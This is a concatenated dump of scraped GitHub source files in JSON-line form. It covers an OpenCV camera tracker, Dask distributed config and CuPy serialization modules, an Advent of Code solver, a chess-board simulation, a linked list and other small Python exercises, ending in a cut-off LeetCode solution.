Cropping\")\n\n# Create file entry fields\nfile_entries = []\nfile_labels = [\"Point Cloud\", \"Orthophoto\", \"TFW File\", \"XYZ File\"]\n\nfor i in range(4):\n file_frame = tk.Frame(window)\n file_frame.pack()\n label = tk.Label(file_frame, text=f\"{file_labels[i]}: \")\n label.pack(side=tk.LEFT)\n entry = tk.Entry(file_frame, width=50)\n entry.pack(side=tk.LEFT)\n browse_button = tk.Button(file_frame, text=\"Browse\", command=lambda entry=entry: browse_file(entry))\n browse_button.pack(side=tk.LEFT)\n file_entries.append(entry)\n\n# Create upload button\nupload_button = tk.Button(window, text=\"Process\", command=upload_files)\nupload_button.pack()\n\n# Run the GUI event loop\nwindow.mainloop()","repo_name":"hahaBlizzard/Main-Code","sub_path":"user_interface.py","file_name":"user_interface.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31477486889","text":"#!/usr/bin/env python\n\n#this class is based on tutorial code from the following link:\n#https://www.pyimagesearch.com/2018/07/30/opencv-object-tracking/\n\nimport sys\ntry:\n sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\n sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')\nexcept Exception as e:\n print(\"no ros kinetic found in path\")\n\nimport numpy as np\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\n\nimport imutils #pip install --upgrade imutils\nimport cv2\nimport time\nimport atexit\nimport rospy\nimport os\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom camera_stuff import detector\n\n\nclass Tracker:\n #\n OPENCV_OBJECT_TRACKERS = {\n \"csrt\": cv2.TrackerCSRT_create, #want accuracy and tolerate lower fps\n \"kcf\": cv2.TrackerKCF_create, #happy medimum of fps vs accuracy\n \"boosting\": cv2.TrackerBoosting_create,\n \"mil\": cv2.TrackerMIL_create,\n \"tld\": cv2.TrackerTLD_create, #author did not recommend\n \"medianflow\": cv2.TrackerMedianFlow_create,\n \"mosse\": cv2.TrackerMOSSE_create #fast tracking(more fps), less accurate\n }\n\n def __init__(self, initBB=None, tracker_type='kcf', width_scale=640, src=0, handleTarget=False, attempt_autoinit=50):\n #take first camera it can\n\n self.vs = VideoStream(src=src).start()\n\n time.sleep(1.0)\n self.width_scale = width_scale\n #initialized after you get the frame\n self.dims = None\n self.updateDims()\n\n self.attempt_autoinit = attempt_autoinit\n self.tracker_type = tracker_type\n\n self.initTracker(initBB)\n\n self.box = self.initBB\n self.success = True\n\n if handleTarget:\n #define bounds where robot is located\n print(\"Specify where robot exists\")\n self.robotBound = self.specifyBoundingBox()\n\n\n #define target Generation box\n\n print(\"Specify where targets should be generated in image\")\n self.targetRange = self.specifyBoundingBox()\n\n #specify Target\n self.targ_psn = np.array([0, 0])\n self.generateTarget()\n else:\n self.handleTarget = handleTarget\n\n #fps information\n self.fps = FPS()\n self.fps.start()\n\n #clean up\n atexit.register(self.shutdown)\n\n def init_box(self):\n for _ in range(self.attempt_autoinit):\n frame = self.readFrame()\n success, self.initBB = detector.detect(frame)\n if success:\n break\n time.sleep(0.05)\n success = False\n return success\n\n def initTracker(self, initBB=None):\n #Set-up Tracker\n if initBB is None:\n success = self.init_box()\n #initialize tracker bounding box if unspecified\n if not self.init_box():\n self.initBB = self.specifyBoundingBox()\n else:\n self.initBB = initBB\n frame = self.readFrame()\n self.curr_frame = frame\n self.tracker = self.OPENCV_OBJECT_TRACKERS[self.tracker_type]()\n self.tracker.init(frame, self.initBB)\n\n def specifyBoundingBox(self):\n frame = self.readFrame()\n boundingBox = cv2.selectROI(\"Frame\", frame,fromCenter=False,\n showCrosshair=True)\n return boundingBox\n\n def inRobotBox(self, v_w, v_h):\n (x, y, w, h) = [int(v) for v in self.robotBound]\n inWidth = x <= v_w and v_w <= x + w\n inHeight = y <= v_h and v_h <= y + h\n return inWidth and inHeight\n\n def getTargetRange(self):\n (w_low,h_low, w, h) = [int(v) for v in self.targetRange]\n w_high = w_low + w\n h_high = h_low + h\n return w_low, w_high, h_low, h_high\n\n def generateTarget(self):\n if self.handleTarget:\n w_low, w_high, h_low, h_high = self.getTargetRange()\n targ_h = np.random.uniform(h_low, h_high)\n targ_w = np.random.uniform(w_low, w_high)\n while self.inRobotBox(targ_w, targ_h):\n #generate target outside bounding box\n targ_h = np.random.uniform(h_low, h_high)\n targ_w = np.random.uniform(w_low, w_high)\n\n self.targ_psn = np.array([targ_h, targ_w])\n else:\n self.targ_psn = np.array([0.0, 0.0])\n\n def resetTracker(self):\n self.box = self.initBB\n self.initTracker()\n\n def getTarget(self):\n return self.targ_psn\n\n def readFrame(self):\n frame = self.vs.read()\n frame = imutils.resize(frame, width=self.width_scale)\n return frame\n\n def updateDims(self):\n frame = self.readFrame()\n (H, W) = frame.shape[:2]\n self.dims = (H, W)\n\n def getDims(self):\n return self.dims\n\n def setWidthScale(self, width_scale):\n self.width_scale = width_scale\n self.updateDims()\n\n def getSuccess(self):\n return self.success\n\n def updateTracker(self):\n frame = self.readFrame()\n (self.success, self.box) = self.tracker.update(frame)\n self.curr_frame = frame\n\n #collect FPS information\n self.fps.update()\n self.fps.stop()\n\n return self.success\n\n def calcReward(self):\n center = self.getTrackerCenter()\n #it's backwards\n center = np.array([center[1], center[0]])\n diff = self.targ_psn - center\n return -np.linalg.norm(diff, 2)\n\n def getTrackerCenter(self):\n (x, y, w, h) = [int(v) for v in self.box]\n return np.array([x + w / 2, y + h / 2])\n\n def getInfo(self):\n info = [\n (\"Tracker\", self.tracker_type),\n (\"Success\", \"Yes\" if self.success else \"No\"),\n (\"FPS\", \"{:.2f}\".format(self.fps.fps())),\n (\"Reward\", \"{:.2f}\".format(self.calcReward() if self.handleTarget else 0.0))\n ]\n return info\n\n def render(self):\n #Visualize tracking box\n (x, y, w, h) = [int(v) for v in self.box]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 255, 0), 2)\n center = self.getTrackerCenter()\n cv2.circle(self.curr_frame, (center[0], center[1]), radius=5, color=(0, 255,0),thickness=-1)\n\n if self.handleTarget:\n #visualize center of box\n targ_h = int(self.targ_psn[0])\n targ_w = int(self.targ_psn[1])\n cv2.circle(self.curr_frame, (targ_w, targ_h), radius=5, color=(0, 255,0),thickness=-1)\n\n #Visualize area no target should appear\n (x, y, w, h) = [int(v) for v in self.robotBound]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 0, 255), 2)\n\n #Visualize area targets generated \n (x, y, w, h) = [int(v) for v in self.targetRange]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (255, 0, 0), 2)\n\n if self.handleTarget:\n #visualize center of box\n targ_h = int(self.targ_psn[0])\n targ_w = int(self.targ_psn[1])\n cv2.circle(self.curr_frame, (targ_w, targ_h), radius=5, color=(0, 255,0),thickness=-1)\n\n #Visualize area no target should appear\n (x, y, w, h) = [int(v) for v in self.robotBound]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 0, 255), 2)\n\n #Visualize area targets generated\n (x, y, w, h) = [int(v) for v in self.targetRange]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (255, 0, 0), 2)\n\n info = self.getInfo()\n # loop over the info tuples and draw them on our frame\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(self.curr_frame, text, (10, self.dims[0] - ((i * 20) + 20)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\n cv2.imshow(\"Frame\", self.curr_frame)\n #if you don't call waitKey the screen immediately disappears\n key = cv2.waitKey(1) & 0xFF\n\n return self.curr_frame\n\n\n def shutdown(self):\n print(\"shut down the show, kill everything\")\n #clean up video stream and all that\n #kill video stream\n self.vs.stop()\n #shutdown any openCV windows\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n import argparse\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-v\", \"--video\", type=str,\n help=\"path to input video file\")\n ap.add_argument(\"-t\", \"--tracker\", type=str, default=\"kcf\",\n help=\"OpenCV object tracker type\")\n ap.add_argument(\"-record\", \"-r\", action=\"store_true\",default=False,\n help=\"flag to record video\")\n ap.add_argument(\"-genTarg\", action=\"store_true\",default=False,\n help=\"flag to keep generating random targets\")\n ap.add_argument(\"-source\", \"-s\", type=int, default=1,\n help=\"specify camera source\")\n args = vars(ap.parse_args())\n print(args.keys())\n\n\n # extract the OpenCV version info\n (major, minor) = cv2.__version__.split(\".\")[:2]\n print(major, minor)\n cam_rew = Tracker(src=args[\"source\"], tracker_type=args[\"tracker\"])\n dims = cam_rew.getDims()\n writer = None\n if args[\"record\"]:\n forcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n\n writer = cv2.VideoWriter(\"example.avi\", forcc, 20,\n (int(dims[1]), int(dims[0])), True)\n while True:\n success = cam_rew.updateTracker()\n frame = cam_rew.render()\n if args[\"genTarg\"]:\n cam_rew.generateTarget()\n if writer is not None:\n writer.write(frame)\n if not success:\n break\n\n if writer is not None:\n writer.release()\n cv2.destroyAllWindows()\n\n","repo_name":"Mi-Przystupa/neural_jacobian_estimation","sub_path":"src/environments/Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"27067398693","text":"from pydantic import validator\n\nfrom tribler.core.config.tribler_config_section import TriblerConfigSection\n\n\n# pylint: disable=no-self-argument\nclass ResourceMonitorSettings(TriblerConfigSection):\n enabled: bool = True\n cpu_priority: int = 1\n poll_interval: int = 5\n history_size: int = 20\n\n @validator('cpu_priority')\n def validate_cpu_priority(cls, v):\n assert 0 <= v <= 5, 'Cpu priority must be in range [0..5]'\n return v\n\n @validator('poll_interval', 'history_size')\n def validate_not_less_than_one(cls, v):\n assert v >= 1, 'Value must be not less than 1'\n return v\n","repo_name":"Tribler/tribler","sub_path":"src/tribler/core/components/resource_monitor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":4368,"dataset":"github-code","pt":"99"} +{"seq_id":"40346989813","text":"import re\nfrom collections import deque\nfrom sys import argv\nfrom typing import List, Dict, Set, Tuple, Optional\n\n\nclass Elf:\n def __init__(self, elf_id: int, base_time: int):\n self.elf_id = elf_id\n self.base_time = base_time\n self.current_step = None\n self.finished_steps = []\n self.time_remaining = 0\n\n def __repr__(self):\n return \"{} @ {}/{} -> {}\".format(self.current_step,\n self.time_remaining,\n self.base_time,\n ''.join(self.finished_steps))\n\n def assign_step(self, step: str):\n self.current_step = step\n self.time_remaining = ord(step) - 64 + self.base_time\n\n def complete_step(self) -> Tuple[str, int]:\n finished = self.current_step\n time_taken = self.time_remaining\n self.finished_steps.append(finished)\n self.current_step = None\n self.time_remaining = 0\n return finished, time_taken\n\n def elapse(self, duration: int):\n self.time_remaining -= duration\n\n\ndef comprehend_instructions(step_list: List[str], part_num: int,\n num_elves: int=5, base_time: int=60):\n dependencies = _determine_dependencies(step_list)\n new_ready = {let for let, deps in dependencies.items()\n if not deps['requires']}\n ready = deque(sorted(new_ready))\n\n if part_num == 1:\n\n all_finished = []\n while len(all_finished) < len(dependencies):\n all_finished.append(ready.popleft())\n\n new_ready = (set(ready) |\n _find_new_ready(dependencies,\n all_finished,\n ready))\n ready = deque(sorted(new_ready))\n\n print(\"ORDERED STEPS:\", ''.join(all_finished))\n\n elif part_num == 2:\n free_elves = deque([Elf(i, base_time) for i in range(num_elves)])\n busy_elves = deque()\n in_progress = set()\n all_finished = []\n total_time = 0\n\n while len(all_finished) < len(dependencies):\n\n while len(free_elves) and len(ready):\n # Assign steps to free elves\n cur_elf = free_elves.popleft()\n next_step = ready.popleft()\n cur_elf.assign_step(next_step)\n in_progress.add(next_step)\n busy_elves.append(cur_elf)\n\n # Find next elf closest to finishing and finish its work\n busy_elves = deque(sorted(busy_elves, key=lambda elf: elf.time_remaining))\n finished_elf = busy_elves.popleft() # type: Elf\n finished_step, time_elapsed = finished_elf.complete_step()\n\n # Update finished steps and elves still working\n all_finished.append(finished_step)\n total_time += time_elapsed\n for busy_elf in busy_elves:\n busy_elf.elapse(time_elapsed)\n\n # Move finished elf back to free and order by elf id\n free_elves.append(finished_elf)\n free_elves = deque(sorted(free_elves, key=lambda elf: elf.elf_id))\n\n new_ready = (set(ready) |\n _find_new_ready(dependencies,\n all_finished,\n ready, in_progress))\n ready = deque(sorted(new_ready))\n\n print(\"TOTAL TIME:\", total_time)\n\n\ndef _find_new_ready(dependencies: Dict, all_finished: List[str], ready: deque,\n in_progress: Optional[Set[str]]=None) -> Set[str]:\n finished_set = set(all_finished)\n in_progress = in_progress or set()\n seen = set(ready) | finished_set | in_progress\n return {let for let, deps in dependencies.items()\n if (not deps['requires'] - finished_set)\n and (let not in seen)}\n\n\ndef _determine_dependencies(steps: List[str]) -> Dict:\n dependencies = {}\n for step in steps:\n required, dependent = re.findall(r' ([A-Z]) ', step)\n # Set permittance relationship\n try:\n dependencies[required]['permits'].add(dependent)\n except KeyError:\n dependencies[required] = {'permits': {dependent},\n 'requires': set()}\n # Set requirement relationship\n try:\n dependencies[dependent]['requires'].add(required)\n except KeyError:\n dependencies[dependent] = {'requires': {required},\n 'permits': set()}\n return dependencies\n\n\nif __name__ == '__main__':\n data_file = argv[1]\n data_lines = [l.strip() for l in open(data_file, 'r').readlines()]\n part = int(argv[2])\n kwargs = {'step_list': data_lines, 'part_num': part}\n if len(argv) > 3:\n kwargs['num_elves'] = int(argv[3])\n if len(argv) > 4:\n kwargs['base_time'] = int(argv[4])\n\n comprehend_instructions(**kwargs)\n","repo_name":"ericbgarnick/AOC","sub_path":"y2018/day07/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71547922244","text":"N, K = map(int, input().split())\n# 처음 해보는 연장된 체스판 만들어보기\nchess_pan = []\nfor _ in range(N):\n temp = list(map(int, input().split()))\n chess_pan.append([2] + temp + [2])\nchess_pan = [([2] * (N + 2))] + chess_pan + [([2] * (N + 2))]\nprint(*chess_pan, sep='\\n')\n# 체스 정보 저장\nchess_position_info = [0] * (K + 1)\nfor i in range(1, K + 1):\n chess_position_info[i] = list(map(int, input().split()))\nprint('posi',chess_position_info)\ncnt = 0\nD = [0, (0,1), (0,-1),(-1,0),(1,0)]\n\nchess_ground = [ [0] * (N + 2) for _ in range(N + 2) ]\nfor i in range(1, K + 1):\n chess = chess_position_info[i]\n y = chess[0]\n x = chess[1]\n direction = chess[2]\n # 방향 정보는 저장 안해도 되겠는데?\n chess_ground[y][x] = [i]\n# print(*chess_ground, sep='\\n')\n\ndef change_d(d):\n if d == 4:\n return 3\n elif d == 3:\n return 4\n elif d == 2:\n return 1\n elif d == 1:\n return 2\n\nflag = False\n# 본격적인 이동 시작.\nwhile cnt < 10:\n cnt += 1\n print(\"cnt\", cnt)\n print(*chess_ground, sep='\\n')\n print('position',chess_position_info)\n for i in range(1, K + 1):\n chess = chess_position_info[i]\n y = chess[0]\n x = chess[1]\n d = chess[2]\n # 슬라이싱 이런거... ㅠㅠ\n if len(chess_ground[y][x]) == 1:\n existed = chess_ground[y][x][:]\n remained = 0\n else:\n for j in range(len(chess_ground[y][x])):\n if chess_ground[y][x][j] == i:\n existed = chess_ground[y][x][:(j+1)]\n remained = chess_ground[y][x][(j+1):]\n if remained == []:\n remained = 0\n moved_y = y + D[d][0]\n moved_x = x + D[d][1]\n\n chess_ground[y][x] = remained\n # 파란색일때\n if chess_pan[moved_y][moved_x] == 2:\n d = change_d(d)\n moved_y = y + D[d][0]\n moved_x = x + D[d][1]\n # 파란색이면 포지션값 무적권 갱신은 해줘야지\n chess_position_info[i][2] = d\n # 맞은편도 파란색일때\n if chess_pan[moved_y][moved_x] == 2:\n moved_y = y\n moved_x = x\n # 체스판에 배정. 일반 색과 동일한 로직 적용\n # 빨간색일때\n if chess_pan[moved_y][moved_x] == 1:\n existed.reverse()\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n else:\n chess_ground[moved_y][moved_x] = chess_ground[moved_y][moved_x] + existed\n elif chess_pan[moved_y][moved_x] == 0:\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n else:\n chess_ground[moved_y][moved_x] = existed + chess_ground[moved_y][moved_x]\n for exist in existed:\n position = chess_position_info[exist][2]\n chess_position_info[exist] = [moved_y, moved_x, position]\n # 파란색 마주치지 않았을 때\n else:\n if chess_pan[moved_y][moved_x] == 1:\n existed.reverse()\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n # 이미 존재할때\n else:\n chess_ground[moved_y][moved_x] = chess_ground[moved_y][moved_x] + existed\n elif chess_pan[moved_y][moved_x] == 0:\n if chess_ground[moved_y][moved_x] == 0:\n chess_ground[moved_y][moved_x] = existed\n # 이미 존재할 때\n else:\n chess_ground[moved_y][moved_x] = existed + chess_ground[moved_y][moved_x]\n for exist in existed:\n position = chess_position_info[exist][2]\n chess_position_info[exist] = [moved_y, moved_x, position]\n\n # if len(chess_ground[moved_y][moved_x]) >= 4:\n # flag = True\n # if flag == True:\n # break\n for i in range(N + 2):\n for j in range(N + 2):\n if chess_ground[i][j] != 0:\n if len(chess_ground[i][j]) >= 4:\n flag = True\n if flag == True:\n break\n\n\nprint(cnt)","repo_name":"blueboy1593/algorithm","sub_path":"A형역량테스트대비(SWER)/17837새로운게임2.py","file_name":"17837새로운게임2.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29256327018","text":"from __future__ import annotations\n\nimport asyncio\nimport logging.config\nimport os\nimport sys\nfrom collections.abc import Callable\nfrom typing import Any\n\nimport yaml\n\nimport dask\nfrom dask.utils import import_required\n\nconfig = dask.config.config\n\n\nfn = os.path.join(os.path.dirname(__file__), \"distributed.yaml\")\n\nwith open(fn) as f:\n defaults = yaml.safe_load(f)\n\ndask.config.update_defaults(defaults)\n\ndeprecations = {\n \"allowed-failures\": \"distributed.scheduler.allowed-failures\",\n \"bandwidth\": \"distributed.scheduler.bandwidth\",\n \"default-data-size\": \"distributed.scheduler.default-data-size\",\n \"work-stealing\": \"distributed.scheduler.work-stealing\",\n \"worker-ttl\": \"distributed.scheduler.worker-ttl\",\n \"multiprocessing-method\": \"distributed.worker.multiprocessing-method\",\n \"use-file-locking\": \"distributed.worker.use-file-locking\",\n \"profile-interval\": \"distributed.worker.profile.interval\",\n \"profile-cycle-interval\": \"distributed.worker.profile.cycle\",\n \"worker-memory-target\": \"distributed.worker.memory.target\",\n \"worker-memory-spill\": \"distributed.worker.memory.spill\",\n \"worker-memory-pause\": \"distributed.worker.memory.pause\",\n \"worker-memory-terminate\": \"distributed.worker.memory.terminate\",\n \"heartbeat-interval\": \"distributed.client.heartbeat\",\n \"compression\": \"distributed.comm.compression\",\n \"connect-timeout\": \"distributed.comm.timeouts.connect\",\n \"tcp-timeout\": \"distributed.comm.timeouts.tcp\",\n \"default-scheme\": \"distributed.comm.default-scheme\",\n \"socket-backlog\": \"distributed.comm.socket-backlog\",\n \"diagnostics-link\": \"distributed.dashboard.link\",\n \"bokeh-export-tool\": \"distributed.dashboard.export-tool\",\n \"tick-time\": \"distributed.admin.tick.interval\",\n \"tick-maximum-delay\": \"distributed.admin.tick.limit\",\n \"log-length\": \"distributed.admin.log-length\",\n \"log-format\": \"distributed.admin.log-format\",\n \"pdb-on-err\": \"distributed.admin.pdb-on-err\",\n \"ucx\": \"distributed.comm.ucx\",\n \"rmm\": \"distributed.rmm\",\n # low-level-log-length aliases\n \"transition-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.scheduler.transition-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.scheduler.events-log-length\": \"distributed.admin.low-level-log-length\",\n \"recent-messages-log-length\": \"distributed.admin.low-level-log-length\",\n \"distributed.comm.recent-messages-log-length\": \"distributed.admin.low-level-log-length\",\n}\n\n# Affects yaml and env variables configs, as well as calls to dask.config.set()\n# before importing distributed\ndask.config.rename(deprecations)\n# Affects dask.config.set() from now on\ndask.config.deprecations.update(deprecations)\n\n\n#########################\n# Logging specific code #\n#########################\n#\n# Here we enact the policies in the logging part of the configuration\n\nlogger = logging.getLogger(__name__)\n\n\nif sys.version_info >= (3, 11):\n _logging_get_level_names_mapping = logging.getLevelNamesMapping\nelse:\n\n def _logging_get_level_names_mapping() -> dict[str, int]:\n return logging._nameToLevel.copy()\n\n\ndef _initialize_logging_old_style(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using the \"old-style\" configuration scheme, e.g.:\n {\n 'logging': {\n 'distributed': 'info',\n 'tornado': 'critical',\n 'tornado.application': 'error',\n }\n }\n \"\"\"\n loggers: dict[str, str | int] = { # default values\n \"distributed\": \"info\",\n \"distributed.client\": \"warning\",\n \"bokeh\": \"error\",\n \"tornado\": \"critical\",\n \"tornado.application\": \"error\",\n }\n base_config = _find_logging_config(config)\n loggers.update(base_config.get(\"logging\", {}))\n\n handler = logging.StreamHandler(sys.stderr)\n handler.setFormatter(\n logging.Formatter(\n dask.config.get(\"distributed.admin.log-format\", config=config)\n )\n )\n logging_names = _logging_get_level_names_mapping()\n for name, raw_level in sorted(loggers.items()):\n level = (\n logging_names[raw_level.upper()]\n if isinstance(raw_level, str)\n else raw_level\n )\n logger = logging.getLogger(name)\n logger.setLevel(level)\n\n # Ensure that we're not registering the logger twice in this hierarchy.\n anc = logging.getLogger(None)\n already_registered = False\n\n for ancestor in name.split(\".\"):\n if anc.handlers:\n already_registered = True\n break\n anc.getChild(ancestor)\n\n if not already_registered:\n logger.addHandler(handler)\n logger.propagate = False\n\n\ndef _initialize_logging_new_style(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using logging's \"Configuration dictionary schema\".\n (ref.: https://docs.python.org/3/library/logging.config.html#configuration-dictionary-schema)\n \"\"\"\n base_config = _find_logging_config(config)\n logging.config.dictConfig(base_config.get(\"logging\")) # type: ignore[arg-type]\n\n\ndef _initialize_logging_file_config(config: dict[Any, Any]) -> None:\n \"\"\"\n Initialize logging using logging's \"Configuration file format\".\n (ref.: https://docs.python.org/3/howto/logging.html#configuring-logging)\n \"\"\"\n base_config = _find_logging_config(config)\n logging.config.fileConfig(\n base_config.get(\"logging-file-config\"), # type: ignore[arg-type]\n disable_existing_loggers=False,\n )\n\n\ndef _find_logging_config(config: dict[Any, Any]) -> dict[Any, Any]:\n \"\"\"\n Look for the dictionary containing logging-specific configurations,\n starting in the 'distributed' dictionary and then trying the top-level\n \"\"\"\n logging_keys = {\"logging-file-config\", \"logging\"}\n if logging_keys & config.get(\"distributed\", {}).keys():\n return config[\"distributed\"]\n else:\n return config\n\n\ndef initialize_logging(config: dict[Any, Any]) -> None:\n base_config = _find_logging_config(config)\n if \"logging-file-config\" in base_config:\n if \"logging\" in base_config:\n raise RuntimeError(\n \"Config options 'logging-file-config' and 'logging' are mutually exclusive.\"\n )\n _initialize_logging_file_config(config)\n else:\n log_config = base_config.get(\"logging\", {})\n if \"version\" in log_config:\n # logging module mandates version to be an int\n log_config[\"version\"] = int(log_config[\"version\"])\n _initialize_logging_new_style(config)\n else:\n _initialize_logging_old_style(config)\n\n\ndef get_loop_factory() -> Callable[[], asyncio.AbstractEventLoop] | None:\n event_loop = dask.config.get(\"distributed.admin.event-loop\")\n if event_loop == \"uvloop\":\n uvloop = import_required(\n \"uvloop\",\n \"The distributed.admin.event-loop configuration value \"\n \"is set to 'uvloop' but the uvloop module is not installed\"\n \"\\n\\n\"\n \"Please either change the config value or install one of the following\\n\"\n \" conda install uvloop\\n\"\n \" pip install uvloop\",\n )\n return uvloop.new_event_loop\n if event_loop in {\"asyncio\", \"tornado\"}:\n if sys.platform == \"win32\":\n # ProactorEventLoop is not compatible with tornado 6\n # fallback to the pre-3.8 default of Selector\n # https://github.com/tornadoweb/tornado/issues/2608\n return asyncio.SelectorEventLoop\n return None\n raise ValueError(\n \"Expected distributed.admin.event-loop to be in ('asyncio', 'tornado', 'uvloop'), got %s\"\n % dask.config.get(\"distributed.admin.event-loop\")\n )\n\n\ninitialize_logging(dask.config.config)\n","repo_name":"dask/distributed","sub_path":"distributed/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":1499,"dataset":"github-code","pt":"99"} +{"seq_id":"29256749348","text":"\"\"\"\nEfficient serialization GPU arrays.\n\"\"\"\nfrom __future__ import annotations\n\nimport copyreg\n\nimport cupy\n\nfrom distributed.protocol.cuda import cuda_deserialize, cuda_serialize\nfrom distributed.protocol.serialize import (\n dask_deserialize,\n dask_serialize,\n register_generic,\n)\n\ntry:\n from distributed.protocol.rmm import (\n dask_deserialize_rmm_device_buffer as dask_deserialize_cuda_buffer,\n )\nexcept ImportError:\n from distributed.protocol.numba import (\n dask_deserialize_numba_array as dask_deserialize_cuda_buffer,\n )\n\n\n@cuda_serialize.register(cupy.ndarray)\ndef cuda_serialize_cupy_ndarray(x):\n # Making sure `x` is behaving\n if not (x.flags[\"C_CONTIGUOUS\"] or x.flags[\"F_CONTIGUOUS\"]):\n x = cupy.array(x, copy=True)\n\n header = x.__cuda_array_interface__.copy()\n header[\"strides\"] = tuple(x.strides)\n frames = [\n cupy.ndarray(\n shape=(x.nbytes,), dtype=cupy.dtype(\"u1\"), memptr=x.data, strides=(1,)\n )\n ]\n\n return header, frames\n\n\n@cuda_deserialize.register(cupy.ndarray)\ndef cuda_deserialize_cupy_ndarray(header, frames):\n (frame,) = frames\n arr = cupy.ndarray(\n shape=header[\"shape\"],\n dtype=header[\"typestr\"],\n memptr=cupy.asarray(frame).data,\n strides=header[\"strides\"],\n )\n return arr\n\n\n@dask_serialize.register(cupy.ndarray)\ndef dask_serialize_cupy_ndarray(x):\n header, frames = cuda_serialize_cupy_ndarray(x)\n frames = [memoryview(cupy.asnumpy(f)) for f in frames]\n return header, frames\n\n\n@dask_deserialize.register(cupy.ndarray)\ndef dask_deserialize_cupy_ndarray(header, frames):\n frames = [dask_deserialize_cuda_buffer(header, frames)]\n arr = cuda_deserialize_cupy_ndarray(header, frames)\n return arr\n\n\ntry:\n from packaging.version import Version\n\n if Version(cupy.__version__) >= Version(\"12\"):\n from cupyx.cusparse import MatDescriptor\n else:\n from cupy.cusparse import MatDescriptor\n from cupyx.scipy.sparse import spmatrix\nexcept ImportError:\n MatDescriptor = None\n spmatrix = None\n\n\nif MatDescriptor is not None:\n\n def reduce_matdescriptor(other):\n # Pickling MatDescriptor errors\n # xref: https://github.com/cupy/cupy/issues/3061\n return MatDescriptor.create, ()\n\n copyreg.pickle(MatDescriptor, reduce_matdescriptor)\n\n @cuda_serialize.register(MatDescriptor)\n @dask_serialize.register(MatDescriptor)\n def serialize_cupy_matdescriptor(x):\n header, frames = {}, []\n return header, frames\n\n @cuda_deserialize.register(MatDescriptor)\n @dask_deserialize.register(MatDescriptor)\n def deserialize_cupy_matdescriptor(header, frames):\n return MatDescriptor.create()\n\n\nif spmatrix is not None:\n for n, s, d in [\n (\"cuda\", cuda_serialize, cuda_deserialize),\n (\"dask\", dask_serialize, dask_deserialize),\n ]:\n register_generic(spmatrix, n, s, d)\n","repo_name":"dask/distributed","sub_path":"distributed/protocol/cupy.py","file_name":"cupy.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":1499,"dataset":"github-code","pt":"99"} +{"seq_id":"41148782022","text":"from sys import stdin\n\n# edge cases:\n# _ asking a city with no outgoing edges\n# _ two independent subgraphs\nN = int(input())\ncities = {}\nfor n in range(N):\n\torig, dst = stdin.readline().split()\n\tcities.setdefault(orig, []).append(dst)\n\tcities.setdefault(dst, [])\n\n# None-unknown, True-safe/marked, False-trapped\nsafe = {}\ndef visit(c):\n\ts = safe.get(c)\n\tif s == None:\n\t\tsafe[c] = True\n\t\ts = False\n\t\tfor dst in cities[c]:\n\t\t\ts |= visit(dst)\n\t\tsafe[c] = s\n\treturn s\n\nfor l in stdin:\n\tl = l.rstrip()\n\tprint('%s %s'%(l, 'safe' if visit(l) else 'trapped'))\n","repo_name":"traffaillac/traf-kattis","sub_path":"runningmom.py","file_name":"runningmom.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27662432007","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass List:\n def __init__(self):\n self.head = None\n\n def insert(self, data):\n newNode = Node(data)\n if self.head is None:\n self.head = newNode\n else:\n cur = self.head\n while cur.next is not None:\n cur = cur.next\n cur.next = newNode\n\n def printList(self):\n if self.head is None:\n print('List is Empty')\n else:\n cur = self.head\n while cur is not None:\n print(cur.data)\n cur = cur.next\n\n\nx = List()\nx.printList()\nx.insert(2)\nx.insert(4)\nx.insert(45)\nx.insert(43)\nx.printList()\n","repo_name":"kunaly1038/Python","sub_path":"Basic Programs/singleLinkedList.py","file_name":"singleLinkedList.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24513222153","text":"# 题目:1106.解析布尔表达式\n# 难度:HARD\n# 最后提交:2022-11-05 13:55:09 +0800 CST\n# 语言:python3\n# 作者:ZrjaK\n\nclass Solution:\n def parseBoolExpr(self, expression: str) -> bool:\n stk = []\n for c in expression:\n if c == ',':\n continue\n if c != ')':\n 